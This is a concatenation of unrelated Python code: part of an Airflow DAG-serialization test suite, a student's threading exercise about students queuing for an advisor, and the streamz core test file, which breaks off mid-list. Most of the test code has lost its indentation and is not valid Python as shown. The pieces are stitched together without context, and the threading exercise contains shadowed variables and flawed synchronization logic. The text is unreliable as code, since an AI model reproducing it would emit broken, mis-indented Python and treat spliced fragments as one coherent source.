task1 = DummyOperator(task_id="task1")
with TaskGroup("group234") as group234:
_ = DummyOperator(task_id="task2")
with TaskGroup("group34") as group34:
_ = DummyOperator(task_id="task3")
_ = DummyOperator(task_id="task4")
task5 = DummyOperator(task_id="task5")
task1 >> group234
group34 >> task5
dag_dict = SerializedDAG.to_dict(dag)
SerializedDAG.validate_schema(dag_dict)
json_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(json_dag, dag)
serialized_dag = SerializedDAG.deserialize_dag(SerializedDAG.serialize_dag(dag))
assert serialized_dag.task_group.children
assert serialized_dag.task_group.children.keys() == dag.task_group.children.keys()
def check_task_group(node):
try:
children = node.children.values()
except AttributeError:
# Round-trip serialization and check the result
expected_serialized = SerializedBaseOperator.serialize_operator(dag.get_task(node.task_id))
expected_deserialized = SerializedBaseOperator.deserialize_operator(expected_serialized)
expected_dict = SerializedBaseOperator.serialize_operator(expected_deserialized)
assert node
assert SerializedBaseOperator.serialize_operator(node) == expected_dict
return
for child in children:
check_task_group(child)
check_task_group(serialized_dag.task_group)
@parameterized.expand(
[
("poke", False),
("reschedule", True),
]
)
def test_serialize_sensor(self, mode, expect_custom_deps):
from airflow.sensors.base import BaseSensorOperator
class DummySensor(BaseSensorOperator):
def poke(self, context):
return False
op = DummySensor(task_id='dummy', mode=mode, poke_interval=23)
blob = SerializedBaseOperator.serialize_operator(op)
if expect_custom_deps:
assert "deps" in blob
else:
assert "deps" not in blob
serialized_op = SerializedBaseOperator.deserialize_operator(blob)
assert op.deps == serialized_op.deps
def test_serialize_event_handler(self):
from airflow.operators.dummy import DummyOperator
from airflow.contrib.jobs.event_handlers import StartEventHandler
from notification_service.base_notification import BaseEvent
from airflow.executors.scheduling_action import SchedulingAction
event = BaseEvent(key='k', value='v')
op = DummyOperator(task_id='dummy', event_handler=StartEventHandler())
encoded_op = SerializedBaseOperator.serialize_operator(op)
deserialized_op = SerializedBaseOperator.deserialize_operator(encoded_op)
event_handler = deserialized_op.get_event_handler()
assert type(event_handler) == StartEventHandler
assert event_handler.handle_event(event, None)[0] == SchedulingAction.START
op = DummyOperator(task_id='dummy')
encoded_op = SerializedBaseOperator.serialize_operator(op)
deserialized_op = SerializedBaseOperator.deserialize_operator(encoded_op)
event_handler = deserialized_op.get_event_handler()
assert event_handler is None
def test_kubernetes_optional():
"""Serialisation / deserialisation continues to work without kubernetes installed"""
def mock__import__(name, globals_=None, locals_=None, fromlist=(), level=0):
if level == 0 and name.partition('.')[0] == 'kubernetes':
raise ImportError("No module named 'kubernetes'")
return importlib.__import__(name, globals=globals_, locals=locals_, fromlist=fromlist, level=level)
with mock.patch('builtins.__import__', side_effect=mock__import__) as import_mock:
# load module from scratch, this does not replace any already imported
# airflow.serialization.serialized_objects module in sys.modules
spec = importlib.util.find_spec("airflow.serialization.serialized_objects")
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
# if we got this far, the module did not try to load kubernetes, but
# did it try to access airflow.kubernetes.*?
imported_airflow = {
c.args[0].split('.', 2)[1] for c in import_mock.call_args_list if c.args[0].startswith("airflow.")
}
assert "kubernetes" not in imported_airflow
# pod loading is not supported when kubernetes is not available
pod_override = {
'__type': 'k8s.V1Pod',
'__var': PodGenerator.serialize_pod(executor_config_pod),
}
with pytest.raises(RuntimeError):
module.BaseSerialization.from_dict(pod_override)
# basic serialization should succeed
module.SerializedDAG.to_dict(make_simple_dag()["simple_dag"])
alumnoyasesor.py
"""Macario Falcon Leonel
Synchronization exercises
Problem: the students and the advisor
Up to 5 students can be in the same advising session
Supports up to 2 questions per student
"""
import threading
import time
import random

alumnos = 0            # students currently inside the advisor's office
auxiliarPreguntas = 0
turno = 0
dicAlu = {}            # questions asked so far, keyed per student
hilos_alum = 1         # student/thread counter (there is no student 0)
mutex = threading.Semaphore(1)           # protects the shared counters and dicAlu
mano = threading.Semaphore(1)            # only one raised hand (question) at a time
cubiculo_vacio = threading.Semaphore(1)  # held while the office is occupied
torniquete = threading.Semaphore(1)      # turnstile at the office door


# Advising session for a student
def asesoria(num):
    print("Advising student %d\n" % num)
    time.sleep(1.2)


# A student asks a question
def duda(num, preguntasMax):
    print("Student %d asks question number %d" % (num, preguntasMax))
    print("Student %d has finished asking" % num)
    time.sleep(1.3)
    asesoria(num)


# Resets the thread counter once the office is empty
def Profesor():
    global hilos_alum
    cubiculo_vacio.acquire()
    print("---> Office empty, professor's nap in progress <---\n")
    hilos_alum = 1
    time.sleep(1.0)
    cubiculo_vacio.release()


def alumno(num):
    global alumnos
    print("Student %d knocks on the door and enters" % num)
    key = chr(num + 48)  # per-student key into dicAlu
    mutex.acquire()
    dicAlu[key] = 0
    mutex.release()
    torniquete.acquire()
    torniquete.release()
    turno = 0
    # each student asks at most 2 questions
    while dicAlu[key] != 2 and turno < 2:
        mano.acquire()
        mutex.acquire()
        alumnos = alumnos + 1
        if alumnos == 1:
            # first student in: mark the office as occupied
            cubiculo_vacio.acquire()
        auxiliarPreguntas = dicAlu[key]
        auxiliarPreguntas += 1
        dicAlu[key] = auxiliarPreguntas
        duda(num, auxiliarPreguntas)
        mutex.release()
        mano.release()
        time.sleep(0.3)
        mutex.acquire()
        turno += 1
        if dicAlu[key] == 2:
            # the counter was incremented once per question, so subtract both
            alumnos -= 2
            if alumnos == 0:
                # last student out: the office is empty again
                cubiculo_vacio.release()
                Profesor()
        mutex.release()
        time.sleep(0.2)


while True:
    # thread counter: admit up to 5 students at random
    while hilos_alum < 6:
        time.sleep(0.05)
        if random.random() < 0.05:
            threading.Thread(target=alumno, args=[hilos_alum]).start()
            hilos_alum += 1
    time.sleep(0.05)  # avoid busy-waiting while waiting for the office to empty
test_core.py
from datetime import timedelta
from functools import partial
import itertools
import json
import operator
from operator import add
import os
from time import time, sleep
import sys
import pytest
from tornado import gen
from tornado.queues import Queue
from tornado.ioloop import IOLoop
import streamz as sz
from streamz import Stream, RefCounter
from streamz.sources import sink_to_file, PeriodicCallback
from streamz.utils_test import (inc, double, gen_test, tmpfile, captured_logger, # noqa: F401
clean, await_for, metadata) # noqa: F401
from distributed.utils_test import loop # noqa: F401
def test_basic():
source = Stream()
b1 = source.map(inc)
b2 = source.map(double)
c = b1.scan(add)
Lc = c.sink_to_list()
Lb = b2.sink_to_list()
for i in range(4):
source.emit(i)
assert Lc == [1, 3, 6, 10]
assert Lb == [0, 2, 4, 6]
def test_no_output():
source = Stream()
assert source.emit(1) is None
def test_scan():
source = Stream()
def f(acc, i):
acc = acc + i
return acc, acc
L = source.scan(f, returns_state=True).sink_to_list()
for i in range(3):
source.emit(i)
assert L == [0, 1, 3]
def test_kwargs():
source = Stream()
def f(acc, x, y=None):
acc = acc + x + y
return acc
L = source.scan(f, y=10).sink_to_list()
for i in range(3):
source.emit(i)
assert L == [0, 11, 23]
def test_filter():
source = Stream()
L = source.filter(lambda x: x % 2 == 0).sink_to_list()
for i in range(10):
source.emit(i)
assert L == [0, 2, 4, 6, 8]
def test_filter_args():
source = Stream()
L = source.filter(lambda x, n: x % n == 0, 2).sink_to_list()
for i in range(10):
source.emit(i)
assert L == [0, 2, 4, 6, 8]
def test_filter_kwargs():
source = Stream()
L = source.filter(lambda x, n=1: x % n == 0, n=2).sink_to_list()
for i in range(10):
source.emit(i)
assert L == [0, 2, 4, 6, 8]
def test_filter_none():
source = Stream()
L = source.filter(None).sink_to_list()
for i in range(10):
source.emit(i % 3)
assert L == [1, 2, 1, 2, 1, 2]
def test_map():
def add(x=0, y=0):
return x + y
source = Stream()
L = source.map(add, y=10).sink_to_list()
source.emit(1)
assert L[0] == 11
def test_map_args():
source = Stream()
L = source.map(operator.add, 10).sink_to_list()
source.emit(1)
assert L == [11]
def test_starmap():
def add(x=0, y=0):
return x + y
source = Stream()
L = source.starmap(add).sink_to_list()
source.emit((1, 10))
assert L[0] == 11
def test_remove():
source = Stream()
L = source.remove(lambda x: x % 2 == 0).sink_to_list()
for i in range(10):
source.emit(i)
assert L == [1, 3, 5, 7, 9]
def test_partition():
source = Stream()
L = source.partition(2).sink_to_list()
for i in range(10):
source.emit(i)
assert L == [(0, 1), (2, 3), (4, 5), (6, 7), (8, 9)]
def test_partition_timeout():
source = Stream()
L = source.partition(10, timeout=0.01).sink_to_list()
for i in range(5):
source.emit(i)
sleep(0.1)
assert L == [(0, 1, 2, 3, 4)]
def test_partition_timeout_cancel():
source = Stream()
L = source.partition(3, timeout=0.1).sink_to_list()
for i in range(3):
source.emit(i)
sleep(0.09)
source.emit(3)
sleep(0.02)
assert L == [(0, 1, 2)]
sleep(0.09)
assert L == [(0, 1, 2), (3,)]
def test_partition_key():
source = Stream()
L = source.partition(2, key=0).sink_to_list()
for i in range(4):
source.emit((i % 2, i))
assert L == [((0, 0), (0, 2)), ((1, 1), (1, 3))]
def test_partition_key_callable():
source = Stream()
L = source.partition(2, key=lambda x: x % 2).sink_to_list()
for i in range(10):
source.emit(i)
assert L == [(0, 2), (1, 3), (4, 6), (5, 7)]
def test_partition_size_one():
source = Stream()
source.partition(1, timeout=.01).sink(lambda x: None)
for i in range(10):
source.emit(i)
def test_sliding_window():
source = Stream()
L = source.sliding_window(2).sink_to_list()
for i in range(10):
source.emit(i)
assert L == [(0, ), (0, 1), (1, 2), (2, 3), (3, 4), (4, 5),
(5, 6), (6, 7), (7, 8), (8, 9)]
L = source.sliding_window(2, return_partial=False).sink_to_list()
for i in range(10):
source.emit(i)
assert L == [(0, 1), (1, 2), (2, 3), (3, 4), (4, 5),
(5, 6), (6, 7), (7, 8), (8, 9)]
def test_sliding_window_ref_counts():
source = Stream()
_ = source.sliding_window(2)
r_prev = RefCounter()
source.emit(-2)
source.emit(-1, metadata=[{'ref': r_prev}])
for i in range(10):
r = RefCounter()
assert r_prev.count == 1
source.emit(i, metadata=[{'ref': r}])
assert r_prev.count == 0
assert r.count == 1
r_prev = r
def test_sliding_window_metadata():
source = Stream()
L = metadata(source.sliding_window(2)).sink_to_list()
source.emit(0)
source.emit(1, metadata=[{'v': 1}])
source.emit(2, metadata=[{'v': 2}])
source.emit(3, metadata=[{'v': 3}])
assert L == [
[{'v': 1}], # First emit, because 0 has no metadata
[{'v': 1}, {'v': 2}], # Second emit
[{'v': 2}, {'v': 3}] # Third emit
]
@gen_test()
def test_backpressure():
q = Queue(maxsize=2)
source = Stream(asynchronous=True)
source.map(inc).scan(add, start=0).sink(q.put)
@gen.coroutine
def read_from_q():
while True:
yield q.get()
yield gen.sleep(0.1)
IOLoop.current().add_callback(read_from_q)
start = time()
for i in range(5):
yield source.emit(i)
end = time()
assert end - start >= 0.2
@gen_test()
def test_timed_window():
source = Stream(asynchronous=True)
a = source.timed_window(0.01)
assert a.loop is IOLoop.current()
L = a.sink_to_list()
for i in range(10):
yield source.emit(i)
yield gen.sleep(0.004)
yield gen.sleep(a.interval)
assert L
assert sum(L, []) == list(range(10))
assert all(len(x) <= 3 for x in L)
assert any(len(x) >= 2 for x in L)
yield gen.sleep(0.1)
assert not L[-1]
@gen_test()
def test_timed_window_ref_counts():
source = Stream()
_ = source.timed_window(0.01)
ref1 = RefCounter()
source.emit(1, metadata=[{'ref': ref1}])
assert ref1.count == 1
yield gen.sleep(0.05)
ref2 = RefCounter()
source.emit(2, metadata=[{'ref': ref2}])
assert ref1.count == 0
assert ref2.count == 1
@gen_test()
def test_timed_window_metadata():
source = Stream()
L = metadata(source.timed_window(0.01)).sink_to_list()
source.emit(0)
source.emit(1, metadata=[{'v': 1}])
yield gen.sleep(0.1)
source.emit(2, metadata=[{'v': 2}])
source.emit(3, metadata=[{'v': 3}])
yield gen.sleep(0.1)
assert L == [
[{'v': 1}], # first emit because 0 has no metadata
[{'v': 2}, {'v': 3}] # second emit
]
def test_timed_window_timedelta(clean): # noqa: F811
pytest.importorskip('pandas')
source = Stream(asynchronous=True)
a = source.timed_window('10ms')
assert a.interval == 0.010
@gen_test()
def test_timed_window_backpressure():
q = Queue(maxsize=1)
source = Stream(asynchronous=True)
source.timed_window(0.01).sink(q.put)
@gen.coroutine
def read_from_q():
while True:
yield q.get()
yield gen.sleep(0.1)
IOLoop.current().add_callback(read_from_q)
start = time()
for i in range(5):
yield source.emit(i)
yield gen.sleep(0.01)
stop = time()
assert stop - start > 0.2
def test_sink_to_file():
with tmpfile() as fn:
source = Stream()
with sink_to_file(fn, source) as f:
source.emit('a')
source.emit('b')
with open(fn) as f:
data = f.read()
assert data == 'a\nb\n'
def test_sink_with_args_and_kwargs():
L = dict()
def mycustomsink(elem, key, prefix=""):
key = prefix + key
if key not in L:
L[key] = list()
L[key].append(elem)
s = Stream()
s.sink(mycustomsink, "cat", "super")
s.emit(1)
s.emit(2)
assert L['supercat'] == [1, 2]
@gen_test()
def test_counter():
counter = itertools.count()
source = PeriodicCallback(lambda: next(counter), 0.001, asynchronous=True)
L = source.sink_to_list()
yield gen.sleep(0.05)
assert L
@gen_test()
def test_rate_limit():
source = Stream(asynchronous=True)
L = source.rate_limit(0.05).sink_to_list()
start = time()
for i in range(5):
yield source.emit(i)
stop = time()
assert stop - start > 0.2
assert len(L) == 5
@gen_test()
def test_delay():
source = Stream(asynchronous=True)
L = source.delay(0.02).sink_to_list()
for i in range(5):
yield source.emit(i)
assert not L
yield gen.sleep(0.04)
assert len(L) < 5
yield gen.sleep(0.1)
assert len(L) == 5
@gen_test()
def test_delay_ref_counts():
source = Stream(asynchronous=True)
_ = source.delay(0.01)
refs = []
for i in range(5):
r = RefCounter()
refs.append(r)
source.emit(i, metadata=[{'ref': r}])
assert all(r.count == 1 for r in refs)
yield gen.sleep(0.05)
assert all(r.count == 0 for r in refs)
@gen_test()
def test_buffer():
source = Stream(asynchronous=True)
L = source.map(inc).buffer(10).map(inc).rate_limit(0.05).sink_to_list()
start = time()
for i in range(10):
yield source.emit(i)
stop = time()
assert stop - start < 0.01
assert not L
start = time()
for i in range(5):
yield source.emit(i)
stop = time()
assert L
assert stop - start > 0.04
@gen_test()
def test_buffer_ref_counts():
source = Stream(asynchronous=True)
_ = source.buffer(5)
refs = []
for i in range(5):
r = RefCounter()
refs.append(r)
source.emit(i, metadata=[{'ref': r}])
assert all(r.count == 1 for r in refs)
yield gen.sleep(0.05)
assert all(r.count == 0 for r in refs)
def test_zip():
a = Stream()
b = Stream()
c = sz.zip(a, b)
L = c.sink_to_list()
a.emit(1)
b.emit('a')
a.emit(2)
b.emit('b')
assert L == [(1, 'a'), (2, 'b')]
d = Stream()
# test zip from the object itself
# zip 3 streams together
e = a.zip(b, d)
L2 = e.sink_to_list()
a.emit(1)
b.emit(2)
d.emit(3)
assert L2 == [(1, 2, 3)]
def test_zip_literals():
a = Stream()
b = Stream()
c = sz.zip(a, 123, b)
L = c.sink_to_list()
a.emit(1)
b.emit(2)
assert L == [(1, 123, 2)]
a.emit(4)
b.emit(5)
assert L == [(1, 123, 2),
(4, 123, 5)]
def test_zip_same():
a = Stream()
b = a.zip(a)
L = b.sink_to_list()
a.emit(1)
a.emit(2)
assert L == [(1, 1), (2, 2)]
def test_combine_latest():
a = Stream()
b = Stream()
c = a.combine_latest(b)
d = a.combine_latest(b, emit_on=[a, b])
L = c.sink_to_list()
L2 = d.sink_to_list()
a.emit(1)
a.emit(2)
b.emit('a')
a.emit(3)
b.emit('b')
assert L == [(2, 'a'), (3, 'a'), (3, 'b')]
assert L2 == [(2, 'a'), (3, 'a'), (3, 'b')]
def test_combine_latest_emit_on():
a = Stream()
b = Stream()
c = a.combine_latest(b, emit_on=a)
L = c.sink_to_list()
a.emit(1)
b.emit('a')
a.emit(2)
a.emit(3)
b.emit('b')
a.emit(4)
assert L == [(2, 'a'), (3, 'a'), (4, 'b')]
def test_combine_latest_emit_on_stream():
a = Stream()
b = Stream()
c = a.combine_latest(b, emit_on=0)
L = c.sink_to_list()
a.emit(1)
b.emit('a')
a.emit(2)
a.emit(3)
b.emit('b')
a.emit(4)
assert L == [(2, 'a'), (3, 'a'), (4, 'b')]
def test_combine_latest_ref_counts():
a = Stream()
b = Stream()
_ = a.combine_latest(b)
ref1 = RefCounter()
a.emit(1, metadata=[{'ref': ref1}])
assert ref1.count == 1
# The new value kicks out the old value
ref2 = RefCounter()
a.emit(2, metadata=[{'ref': ref2}])
assert ref1.count == 0
assert ref2.count == 1
# The value on stream a is still retained and the value on stream b is new
ref3 = RefCounter()
b.emit(3, metadata=[{'ref': ref3}])
assert ref2.count == 1
assert ref3.count == 1
def test_combine_latest_metadata():
a = Stream()
b = Stream()
L = metadata(a.combine_latest(b)).sink_to_list()
a.emit(1, metadata=[{'v': 1}])
b.emit(2, metadata=[{'v': 2}])
b.emit(3)
b.emit(4, metadata=[{'v': 4}])
assert L == [
[{'v': 1}, {'v': 2}], # first emit when 2 is introduced
[{'v': 1}], # 3 has no metadata but it replaces the value on 'b'
[{'v': 1}, {'v': 4}] # 4 replaces the value without metadata on 'b'
]
@gen_test()
def test_zip_timeout():
a = Stream(asynchronous=True)
b = Stream(asynchronous=True)
c = sz.zip(a, b, maxsize=2)
L = c.sink_to_list()
a.emit(1)
a.emit(2)
future = a.emit(3)
with pytest.raises(gen.TimeoutError):
yield gen.with_timeout(timedelta(seconds=0.01), future)
b.emit('a')
yield future
assert L == [(1, 'a')]
def test_zip_ref_counts():
a = Stream()
b = Stream()
_ = a.zip(b)
# The first value in a becomes buffered
ref1 = RefCounter()
a.emit(1, metadata=[{'ref': ref1}])
assert ref1.count == 1
# The second value in a also becomes buffered
ref2 = RefCounter()
a.emit(2, metadata=[{'ref': ref2}])
assert ref1.count == 1
assert ref2.count == 1
# All emitted values are removed from the buffer
ref3 = RefCounter()
b.emit(3, metadata=[{'ref': ref3}])
assert ref1.count == 0
assert ref2.count == 1 # still in the buffer
assert ref3.count == 0
def test_zip_metadata():
a = Stream()
b = Stream()
L = metadata(a.zip(b)).sink_to_list()
a.emit(1, metadata=[{'v': 1}])
b.emit(2, metadata=[{'v': 2}])
a.emit(3)
b.emit(4, metadata=[{'v': 4}])
assert L == [
[{'v': 1}, {'v': 2}], # first emit when 2 is introduced
[{'v': 4}] # second emit when 4 is introduced, and 3 has no metadata
]
def test_frequencies():
source = Stream()
L = source.frequencies().sink_to_list()
source.emit('a')
source.emit('b')
source.emit('a')
assert L[-1] == {'a': 2, 'b': 1}
def test_flatten():
source = Stream()
L = source.flatten().sink_to_list()
source.emit([1, 2, 3])
source.emit([4, 5])
source.emit([6, 7, 8])
assert L == [1, 2, 3, 4, 5, 6, 7, 8]
def test_unique():
source = Stream()
L = source.unique().sink_to_list()
source.emit(1)
source.emit(2)
source.emit(1)
assert L == [1, 2]
def test_unique_key():
source = Stream()
L = source.unique(key=lambda x: x % 2, maxsize=1).sink_to_list()
source.emit(1)
source.emit(2)
source.emit(4)
source.emit(6)
source.emit(3)
assert L == [1, 2, 3]
def test_unique_metadata():
source = Stream()
L = metadata(source.unique()).flatten().sink_to_list()
for i in range(5):
source.emit(i, metadata=[{'v': i}])
assert L == [{'v': i} for i in range(5)]
def test_unique_history():
source = Stream()
s = source.unique(maxsize=2)
s2 = source.unique(maxsize=2, hashable=False)
L = s.sink_to_list()
L2 = s2.sink_to_list()
source.emit(1)
source.emit(2)
source.emit(1)
source.emit(2)
source.emit(1)
source.emit(2)
assert L == [1, 2]
assert L == L2
source.emit(3)
source.emit(2)
assert L == [1, 2, 3]
assert L == L2
source.emit(1)
assert L == [1, 2, 3, 1]
assert L == L2
# update 2 position
source.emit(2)
# knock out 1
source.emit(3)
# update 2 position
source.emit(2)
assert L == [1, 2, 3, 1, 3]
assert L == L2
def test_unique_history_dict():
source = Stream()
s = source.unique(maxsize=2, hashable=False)
L = s.sink_to_list()
a = {'hi': 'world'}
b = {'hi': 'bar'}
c = {'foo': 'bar'}
source.emit(a)
source.emit(b)
source.emit(a)
source.emit(b)
source.emit(a)
source.emit(b)
assert L == [a, b]
source.emit(c)
source.emit(b)
assert L == [a, b, c]
source.emit(a)
assert L == [a, b, c, a]
def test_union():
a = Stream()
b = Stream()
c = Stream()
L = a.union(b, c).sink_to_list()
a.emit(1)
assert L == [1]
b.emit(2)
assert L == [1, 2]
a.emit(3)
assert L == [1, 2, 3]
c.emit(4)
assert L == [1, 2, 3, 4]
def test_pluck():
a = Stream()
L = a.pluck(1).sink_to_list()
a.emit([1, 2, 3])
assert L == [2]
a.emit([4, 5, 6, 7, 8, 9])
assert L == [2, 5]
with pytest.raises(IndexError):
a.emit([1])
def test_pluck_list():
a = Stream()
L = a.pluck([0, 2]).sink_to_list()
a.emit([1, 2, 3])
assert L == [(1, 3)]
a.emit([4, 5, 6, 7, 8, 9])
assert L == [(1, 3), (4, 6)]
with pytest.raises(IndexError):
a.emit([1])
def test_collect():
source1 = Stream()
source2 = Stream()
collector = source1.collect()
L = collector.sink_to_list()
source2.sink(collector.flush)
source1.emit(1)
source1.emit(2)
assert L == []
source2.emit('anything') # flushes collector
assert L == [(1, 2)]
source2.emit('anything')
assert L == [(1, 2), ()]
source1.emit(3)
assert L == [(1, 2), ()]
source2.emit('anything')
assert L == [(1, 2), (), (3,)]
def test_collect_ref_counts():
source = Stream()
collector = source.collect()
refs = []
for i in range(10):
r = RefCounter()
refs.append(r)
source.emit(i, metadata=[{'ref': r}])
assert all(r.count == 1 for r in refs)
collector.flush()
assert all(r.count == 0 for r in refs)
def test_collect_metadata():
source = Stream()
collector = source.collect()
L = metadata(collector).sink_to_list()
source.emit(0)
source.emit(1, metadata=[{'v': 1}])
source.emit(2, metadata=[{'v': 2}])
collector.flush()
source.emit(3, metadata=[{'v': 3}])
source.emit(4, metadata=[{'v': 4}])
collector.flush()
assert L == [
[{'v': 1}, {'v': 2}], # Flush 0-2, but 0 has no metadata
[{'v': 3}, {'v': 4}] # Flush the rest
]
def test_map_str():
def add(x=0, y=0):
return x + y
source = Stream()
s = source.map(add, y=10)
assert str(s) == '<map: add>'
def test_filter_str():
def iseven(x):
return x % 2 == 0
source = Stream()
s = source.filter(iseven)
assert str(s) == '<filter: iseven>'
def test_timed_window_str(clean): # noqa: F811
source = Stream()
s = source.timed_window(.05)
assert str(s) == '<timed_window: 0.05>'
def test_partition_str():
source = Stream()
s = source.partition(2)
assert str(s) == '<partition: 2>'
def test_partition_ref_counts():
source = Stream()
_ = source.partition(2)
for i in range(10):
r = RefCounter()
source.emit(i, metadata=[{'ref': r}])
if i % 2 == 0:
assert r.count == 1
else:
assert r.count == 0
def test_partition_metadata():
source = Stream()
L = metadata(source.partition(2)).sink_to_list()
source.emit(0)
source.emit(1, metadata=[{'v': 1}])
source.emit(2, metadata=[{'v': 2}])
source.emit(3, metadata=[{'v': 3}])
assert L == [
[{'v': 1}], # first emit when 1 is introduced. 0 has no metadata
[{'v': 2}, {'v': 3}] # second emit
]
def test_stream_name_str():
source = Stream(stream_name='this is not a stream')
assert str(source) == '<this is not a stream; Stream>'
def test_zip_latest():
a = Stream()
b = Stream()
c = a.zip_latest(b)
d = a.combine_latest(b, emit_on=a)
L = c.sink_to_list()
L2 = d.sink_to_list()
a.emit(1)
a.emit(2)
b.emit('a')
b.emit('b')
a.emit(3)
assert L == [(1, 'a'), (2, 'a'), (3, 'b')]
assert L2 == [(3, 'b')]
def test_zip_latest_reverse():
a = Stream()
b = Stream()
c = a.zip_latest(b)
L = c.sink_to_list()
b.emit('a')
a.emit(1)
a.emit(2)
a.emit(3)
b.emit('b')
a.emit(4)
assert L == [(1, 'a'), (2, 'a'), (3, 'a'), (4, 'b')]
def test_triple_zip_latest():
from streamz.core import Stream
s1 = Stream()
s2 = Stream()
s3 = Stream()
s_simple = s1.zip_latest(s2, s3)
L_simple = s_simple.sink_to_list()
s1.emit(1)
s2.emit('I')
s2.emit("II")
s1.emit(2)
s2.emit("III")
s3.emit('a')
s3.emit('b')
s1.emit(3)
assert L_simple == [(1, 'III', 'a'), (2, 'III', 'a'), (3, 'III', 'b')]
def test_zip_latest_ref_counts():
a = Stream()
b = Stream()
_ = a.zip_latest(b)
ref1 = RefCounter()
a.emit(1, metadata=[{'ref': ref1}])
assert ref1.count == 1 # Retained until stream b has a value
# The lossless stream is never retained if all upstreams have a value
ref2 = RefCounter()
b.emit(2, metadata=[{'ref': ref2}])
assert ref1.count == 0
assert ref2.count == 1
# Kick out the stream b value and verify it has zero references
ref3 = RefCounter()
b.emit(3, metadata=[{'ref': ref3}])
assert ref2.count == 0
assert ref3.count == 1
# Verify the lossless value is not retained, but the lossy value is
ref4 = RefCounter()
a.emit(3, metadata=[{'ref': ref4}])
assert ref3.count == 1
assert ref4.count == 0
def test_zip_latest_metadata():
a = Stream()
b = Stream()
L = metadata(a.zip_latest(b)).sink_to_list()
a.emit(1, metadata=[{'v': 1}])
b.emit(2, metadata=[{'v': 2}])
a.emit(3)
b.emit(4, metadata=[{'v': 4}])
assert L == [
[{'v': 1}, {'v': 2}], # the first emit when 2 is introduced
[{'v': 2}] # 3 has no metadata
]
def test_connect():
source_downstream = Stream()
# connect assumes this default behaviour
# of stream initialization
assert not source_downstream.downstreams
assert source_downstream.upstreams == [None]
# initialize the second stream to connect to
source_upstream = Stream()
    sout = source_downstream.map(lambda x: x + 1)
L = list()
sout = sout.map(L.append)
source_upstream.connect(source_downstream)
source_upstream.emit(2)
source_upstream.emit(4)
assert L == [3, 5]
def test_multi_connect():
source0 = Stream()
source1 = Stream()
source_downstream = source0.union(source1)
# connect assumes this default behaviour
# of stream initialization
assert not source_downstream.downstreams
# initialize the second stream to connect to
source_upstream = Stream()
    sout = source_downstream.map(lambda x: x + 1)
L = list()
sout = sout.map(L.append)
source_upstream.connect(source_downstream)
source_upstream.emit(2)
source_upstream.emit(4)
assert L == [3, 5]
def test_disconnect():
source = Stream()
upstream = Stream()
L = upstream.sink_to_list()
source.emit(1)
assert L == []
source.connect(upstream)
source.emit(2)
source.emit(3)
assert L == [2, 3]
source.disconnect(upstream)
source.emit(4)
assert L == [2, 3]
def test_gc():
source = Stream()
L = []
a = source.map(L.append)
source.emit(1)
assert L == [1]
del a
import gc; gc.collect()
start = time()
while source.downstreams:
sleep(0.01)
assert time() < start + 1
source.emit(2)
assert L == [1]
@gen_test()
def test_from_file():
with tmpfile() as fn:
with open(fn, 'wt') as f:
f.write('{"x": 1, "y": 2}\n')
f.write('{"x": 2, "y": 2}\n')
f.write('{"x": 3, "y": 2}\n')
f.flush()
source = Stream.from_textfile(fn, poll_interval=0.010,
asynchronous=True, start=False)
L = source.map(json.loads).pluck('x').sink_to_list()
assert L == []
source.start()
yield await_for(lambda: len(L) == 3, timeout=5)
assert L == [1, 2, 3]
f.write('{"x": 4, "y": 2}\n')
f.write('{"x": 5, "y": 2}\n')
f.flush()
start = time()
while L != [1, 2, 3, 4, 5]:
yield gen.sleep(0.01)
assert time() < start + 2 # reads within 2s
@gen_test()
def test_from_file_end():
with tmpfile() as fn:
with open(fn, 'wt') as f:
f.write('data1\n')
f.flush()
source = Stream.from_textfile(fn, poll_interval=0.010,
start=False, from_end=True)
out = source.sink_to_list()
source.start()
assert out == []
yield await_for(lambda: source.started, 2, period=0.02)
f.write('data2\n')
f.flush()
yield await_for(lambda: out == ['data2\n'], timeout=5, period=0.1)
@gen_test()
def test_filenames():
with tmpfile() as fn:
os.mkdir(fn)
with open(os.path.join(fn, 'a'), 'w'):
pass
with open(os.path.join(fn, 'b'), 'w'):
pass
source = Stream.filenames(fn, asynchronous=True)
L = source.sink_to_list()
source.start()
while len(L) < 2:
yield gen.sleep(0.01)
assert L == [os.path.join(fn, x) for x in ['a', 'b']]
with open(os.path.join(fn, 'c'), 'w'):
pass
while len(L) < 3:
yield gen.sleep(0.01)
assert L == [os.path.join(fn, x) for x in ['a', 'b', 'c']]
def test_docstrings():
for s in [Stream, Stream()]:
assert 'every element' in s.map.__doc__
assert s.map.__name__ == 'map'
assert 'predicate' in s.filter.__doc__
assert s.filter.__name__ == 'filter'
def test_subclass():
class NewStream(Stream):
pass
@NewStream.register_api()
class foo(NewStream):
pass
assert hasattr(NewStream, 'map')
assert hasattr(NewStream(), 'map')
assert hasattr(NewStream, 'foo')
assert hasattr(NewStream(), 'foo')
assert not hasattr(Stream, 'foo')
assert not hasattr(Stream(), 'foo')
@gen_test()
def test_latest():
source = Stream(asynchronous=True)
L = []
@gen.coroutine
def slow_write(x):
yield gen.sleep(0.050)
L.append(x)
s = source.map(inc).latest().map(slow_write) # noqa: F841
source.emit(1)
yield gen.sleep(0.010)
source.emit(2)
source.emit(3)
start = time()
while len(L) < 2:
yield gen.sleep(0.01)
assert time() < start + 3
assert L == [2, 4]
yield gen.sleep(0.060)
assert L == [2, 4]
def test_latest_ref_counts():
source = Stream()
_ = source.latest()
ref1 = RefCounter()
source.emit(1, metadata=[{'ref': ref1}])
assert ref1.count == 1
ref2 = RefCounter()
source.emit(2, metadata=[{'ref': ref2}])
assert ref1.count == 0
assert ref2.count == 1
def test_destroy():
source = Stream()
s = source.map(inc)
L = s.sink_to_list()
source.emit(1)
assert L == [2]
s.destroy()
assert not list(source.downstreams)
assert not s.upstreams
source.emit(2)
assert L == [2]
def dont_test_stream_kwargs(clean): # noqa: F811
''' Test the good and bad kwargs for the stream
Currently just stream_name
'''
test_name = "some test name"
sin = Stream(stream_name=test_name)
sin2 = Stream()
assert sin.name == test_name
# when not defined, should be None
assert sin2.name is None
# add new core methods here, initialized
# these should be functions, use partial to partially initialize them
# (if they require more arguments)
streams = [
# some filter kwargs, so we comment them out
        partial(sin.map, lambda x: x),
        partial(sin.accumulate, lambda x1, x2: x1),
        partial(sin.filter, lambda x: True),
partial(sin.partition, 2),
partial(sin.sliding_window, 2),
partial(sin.timed_window, .01),
partial(sin.rate_limit, .01),
partial(sin.delay, .02),
partial(sin.buffer, 2),
partial(sin.zip, sin2),
partial(sin.combine_latest, sin2),
